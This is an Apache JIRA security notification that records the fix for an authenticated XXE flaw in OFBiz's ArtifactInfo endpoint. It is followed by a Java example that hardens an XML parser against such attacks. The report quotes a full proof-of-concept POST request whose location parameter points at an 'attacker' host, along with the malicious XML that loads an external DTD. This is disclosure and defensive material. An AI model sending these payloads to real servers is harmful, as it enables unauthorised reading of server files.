[ https://issues.apache.org/jira/browse/OFBIZ-12306?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17413963#comment-17413963 ]

ASF subversion and git services commented on OFBIZ-12306:
---------------------------------------------------------

Commit 24c72edc4ca87f0357edb774e7f8a3a1a5305063 in ofbiz-framework's branch 
refs/heads/release18.12 from Jacques Le Roux
[ https://gitbox.apache.org/repos/asf?p=ofbiz-framework.git;h=24c72ed ]

Fixed: Found a new XXE (XML External Entity Injection) vulnerability in 
ArtifactInfo (OFBIZ-12306)

The XXE vulnerability can read arbitrary files on the server.

Thanks: thiscodecc for reporting this security issue (post-auth)


> Found a new XXE (XML External Entity Injection) vulnerability in ArtifactInfo
> -----------------------------------------------------------------------------
>
>                 Key: OFBIZ-12306
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12306
>             Project: OFBiz
>          Issue Type: Bug
>    Affects Versions: 17.12.08
>            Reporter: thiscodecc
>            Assignee: Jacques Le Roux
>            Priority: Major
>              Labels: security
>
> The http packet is as follows:
> POST /webtools/control/ArtifactInfo HTTP/1.1
> Host: 127.0.0.1:8443
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
> Accept-Encoding: gzip, deflate
> Referer: https://127.0.0.1:8443/webtools/control/ArtifactInfo
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
> Origin: https://127.0.0.1:8443
> Connection: close
> Cookie: JSESSIONID=E5591794A3BE924E307356FCA2B0A1A6.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
> name=x&location=http://attacker:8111/2.xml&type=request&submitButton=Lookup
>
> The content of the 2.xml file of the attacker's http service is as follows:
>
> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Quan SYSTEM "http://127.0.0.1:12311/vlab.dtd";><xml-body></xml-body>
> The XXE vulnerability can read arbitrary files on the server.



--
This message was sent by Atlassian Jira
(v8.3.4#803005)
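The report above hinges on the parser following the DOCTYPE's external DTD reference when the fetched document is parsed. The following is an added illustration, written for this page and not OFBiz code nor the change committed in 24c72edc, of how a JAXP DOM parser is configured so that such a document is rejected before any DTD or entity is resolved. The sample XML string is constructed here from the 2.xml shown in the report; the class and method names are this example's own.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedXmlParse {

    // Constructed sample: the shape of the 2.xml from the report, a DOCTYPE pointing at an external DTD.
    static final String EXTERNAL_DTD_SAMPLE =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        + "<!DOCTYPE Quan SYSTEM \"http://127.0.0.1:12311/vlab.dtd\"><xml-body></xml-body>";

    // Constructed sample: a plain document with no DTD, which should still parse.
    static final String PLAIN_SAMPLE = "<xml-body><entry name=\"x\"/></xml-body>";

    /** Builds a factory that refuses DTDs entirely and disables every external resolution path. */
    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Primary control: any DOCTYPE makes the parser throw, so no DTD is ever fetched.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers where a DOCTYPE must be tolerated: no external entities, no external DTD load.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    /** Returns true when the document was accepted by the hardened parser, false when it was rejected. */
    public static boolean accepts(String xml) {
        try {
            DocumentBuilder db = hardenedFactory().newDocumentBuilder();
            Document doc = db.parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement() != null;
        } catch (SAXException e) {
            // With disallow-doctype-decl set, the DOCTYPE itself is the parse error; nothing is resolved.
            return false;
        } catch (ParserConfigurationException | IOException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("document with external DTD accepted: " + accepts(EXTERNAL_DTD_SAMPLE));
        System.out.println("plain document accepted: " + accepts(PLAIN_SAMPLE));
    }
}
```

Rejecting the DOCTYPE is the control to reach for first, since it removes the DTD fetch and entity expansion in one step; the remaining features matter on code paths that must keep accepting DTDs, where each external resolution route has to be closed individually. Independently of parser settings, a parameter such as `location` that is turned into a URL deserves its own allow-list check on scheme and target, so that the server is not asked to fetch content from arbitrary hosts at all.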
